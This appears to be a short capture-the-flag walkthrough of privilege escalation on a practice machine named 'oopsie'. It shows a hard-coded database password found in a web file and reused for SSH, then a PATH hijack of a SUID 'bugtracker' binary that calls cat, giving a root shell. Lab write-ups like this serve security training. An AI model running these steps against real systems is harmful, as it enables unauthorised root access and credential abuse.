3 box enum > privesc
cd /home
ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Jan 23 2020 .
drwxr-xr-x 24 root root 4096 Jan 27 2020 ..
drwxr-xr-x 7 robert robert 4096 Apr 24 21:48 robert
grep -rnw /var/www/html/ -e robert 2>/dev/null
./cdn-cgi/login/db.php:2:$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
$ ssh robert@10.10.10.28
robert@oopsie:~$ whoami
robert
robert@oopsie:~$ sudo -l
[sudo] password for robert:
Sorry, user robert may not run sudo on oopsie.
LinPEAS
-rwsr-xr-- 1 root bugtracker 8.6K Jan 25 2020 /usr/bin/bugtracker
--- Trying to execute /usr/bin/bugtracker with strace in order to look for hijackable libraries...
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
robert@oopsie:~$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
---------------
cat: /root/reports/10: No such file or directory
binary is trying to cat - without absolute path.
robert@oopsie:~$ cd /tmp
robert@oopsie:/tmp$ echo "/bin/bash" > cat
robert@oopsie:/tmp$ chmod +x cat
robert@oopsie:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
robert@oopsie:/tmp$ export PATH="/tmp:$PATH"
robert@oopsie:/tmp$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
---------------
root@oopsie:/tmp# whoami
root
we cannot use cat anymore as we exploited it so either use `more` or `rm /tmp/cat`
Last updated